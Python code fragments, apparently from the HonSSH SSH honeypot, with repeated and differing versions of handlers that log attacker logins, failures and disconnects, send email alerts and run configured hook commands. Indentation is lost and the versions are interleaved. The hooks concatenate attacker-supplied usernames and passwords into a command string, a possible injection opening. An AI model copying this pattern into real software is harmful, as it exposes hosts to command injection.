def loginSuccessful(self, username, password):
self.passwordTried = True
self.loginSuccess = True
dt = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
self.makeSessionFolder()
if self.cfg.get('txtlog', 'enabled') == 'true':
txtlog.authLog(self.cfg.get('folders', 'log_path') + "/" + datetime.datetime.now().strftime("%Y%m%d"), self.endIP, username, password, True)
txtlog.log(self.txtlog_file, self.connectionString)
txtlog.log(self.txtlog_file, '[SSH ] Login Successful: ' + username + ':' + password)
if self.cfg.get('email', 'login') == 'true':
threads.deferToThread(self.email, self.sensorName + ' - Login Successful', self.txtlog_file)
if self.cfg.get('database_mysql', 'enabled') == 'true':
self.dbLog.handleLoginSucceeded(username, password)
self.dbLog.createSession(self.sessionID, self.endIP, self.endPort, self.honeyIP, self.honeyPort, self.sensorName)
self.dbLog.handleClientVersion(self.sessionID, self.version)
if self.cfg.get('hpfeeds', 'enabled') == 'true':
self.hpLog.handleLoginSucceeded(username, password)
self.hpLog.createSession(self.sessionID, self.endIP, self.endPort, self.honeyIP, self.honeyPort)
self.hpLog.handleClientVersion(self.version)
if self.cfg.has_option('app_hooks', 'login_successful'):
if self.cfg.get('app_hooks', 'login_successful') != '':
cmdString = self.cfg.get('app_hooks', 'login_successful') + " LOGIN_SUCCESSFUL " + dt + " " + self.endIP + " " + username + " " + password
threads.deferToThread(self.runCommand, cmdString)
def connectionLost(self):
dt = self.getDateTime()
log.msg("[OUTPUT] Lost Connection with the attacker: %s" % self.endIP)
if not self.passwordTried:
if self.cfg.get('txtlog', 'enabled') == 'true':
txtlog.authLog(dt, self.cfg.get('folders', 'log_path') + "/" + datetime.datetime.now().strftime("%Y%m%d"), self.endIP, '', '', False)
if self.loginSuccess:
if self.cfg.get('txtlog', 'enabled') == 'true':
if os.path.exists(self.txtlog_file):
txtlog.log(dt, self.txtlog_file, '[SSH ] Lost Connection with ' + self.endIP)
if self.cfg.get('database_mysql', 'enabled') == 'true':
self.dbLog.handleConnectionLost(dt, self.sessionID)
if self.cfg.get('hpfeeds', 'enabled') == 'true':
self.hpLog.handleConnectionLost(dt)
if self.cfg.get('email', 'attack') == 'true':
threads.deferToThread(self.email, self.sensorName + ' - Attack logged', self.txtlog_file, self.ttyFiles)
if self.cfg.has_option('app_hooks', 'connection_lost'):
if self.cfg.get('app_hooks', 'connection_lost') != '':
cmdString = self.cfg.get('app_hooks', 'connection_lost') + " CONNECTION_LOST " + dt + " " + self.endIP
threads.deferToThread(self.runCommand, cmdString)
self.connections.delConn(self.sensorName, self.endIP, self.endPort)
def loginSuccessful(self, username, password):
self.passwordTried = True
self.loginSuccess = True
dt = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
self.makeSessionFolder()
if self.cfg.get('txtlog', 'enabled') == 'true':
txtlog.authLog(self.cfg.get('folders', 'log_path') + "/" + datetime.datetime.now().strftime("%Y%m%d"), self.endIP, username, password, True)
txtlog.log(self.txtlog_file, self.connectionString)
txtlog.log(self.txtlog_file, '[SSH ] Login Successful: ' + username + ':' + password)
if self.cfg.get('email', 'login') == 'true':
threads.deferToThread(self.email, 'HonSSH - Login Successful', self.txtlog_file)
if self.cfg.get('database_mysql', 'enabled') == 'true':
self.dbLog.handleLoginSucceeded(username, password)
self.dbLog.createSession(self.sessionID, self.endIP, self.endPort, self.cfg.get('honeypot', 'ssh_addr'), self.cfg.get('honeypot', 'ssh_port'))
self.dbLog.handleClientVersion(self.sessionID, self.version)
if self.cfg.get('hpfeeds', 'enabled') == 'true':
self.hpLog.handleLoginSucceeded(username, password)
self.hpLog.createSession(self.sessionID, self.endIP, self.endPort, self.cfg.get('honeypot', 'ssh_addr'), self.cfg.get('honeypot', 'ssh_port'))
self.hpLog.handleClientVersion(self.version)
if self.cfg.has_option('app_hooks', 'login_successful'):
if self.cfg.get('app_hooks', 'login_successful') != '':
cmdString = self.cfg.get('app_hooks', 'login_successful') + " LOGIN_SUCCESSFUL " + dt + " " + self.endIP + " " + username + " " + password
threads.deferToThread(self.runCommand, cmdString)
def loginFailed(self, username, password):
self.passwordTried = True
dt = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
if self.cfg.get('txtlog', 'enabled') == 'true':
txtlog.authLog(self.cfg.get('folders', 'log_path') + "/" + datetime.datetime.now().strftime("%Y%m%d"), self.endIP, username, password, False)
if self.cfg.get('database_mysql', 'enabled') == 'true':
self.dbLog.handleLoginFailed(username, password)
if self.cfg.get('hpfeeds', 'enabled') == 'true':
self.hpLog.handleLoginFailed(username, password)
if self.cfg.has_option('app_hooks', 'login_failed'):
if self.cfg.get('app_hooks', 'login_failed') != '':
cmdString = self.cfg.get('app_hooks', 'login_failed') + " LOGIN_FAILED " + dt + " " + self.endIP + " " + username + " " + password
threads.deferToThread(self.runCommand, cmdString)
def loginFailed(self, username, password):
self.passwordTried = True
dt = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
if self.cfg.get('txtlog', 'enabled') == 'true':
txtlog.authLog(self.cfg.get('folders', 'log_path') + "/" + datetime.datetime.now().strftime("%Y%m%d"), self.endIP, username, password, False)
if self.cfg.get('database_mysql', 'enabled') == 'true':
self.dbLog.handleLoginFailed(username, password)
if self.cfg.get('hpfeeds', 'enabled') == 'true':
self.hpLog.handleLoginFailed(username, password)
if self.cfg.has_option('app_hooks', 'login_failed'):
if self.cfg.get('app_hooks', 'login_failed') != '':
cmdString = self.cfg.get('app_hooks', 'login_failed') + " LOGIN_FAILED " + dt + " " + self.endIP + " " + username + " " + password
threads.deferToThread(self.runCommand, cmdString)
def connectionLost(self):
log.msg("[OUTPUT] Lost Connection with the attacker: %s" % self.endIP)
if not self.passwordTried:
if self.cfg.get('txtlog', 'enabled') == 'true':
txtlog.authLog(self.cfg.get('folders', 'log_path') + "/" + datetime.datetime.now().strftime("%Y%m%d"), self.endIP, '', '', False)
if self.loginSuccess:
if self.cfg.get('txtlog', 'enabled') == 'true':
if os.path.exists(self.txtlog_file):
txtlog.log(self.txtlog_file, '[SSH ] Lost Connection with ' + self.endIP)
if self.cfg.get('database_mysql', 'enabled') == 'true':
self.dbLog.handleConnectionLost(self.sessionID)
if self.cfg.get('hpfeeds', 'enabled') == 'true':
self.hpLog.handleConnectionLost()
if self.cfg.get('email', 'attack') == 'true':
threads.deferToThread(self.email, 'HonSSH - Attack logged', self.txtlog_file, self.ttyFiles)
dt = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
if self.cfg.has_option('app_hooks', 'connection_lost'):
if self.cfg.get('app_hooks', 'connection_lost') != '':
cmdString = self.cfg.get('app_hooks', 'connection_lost') + " CONNECTION_LOST " + dt + " " + self.endIP
threads.deferToThread(self.runCommand, cmdString)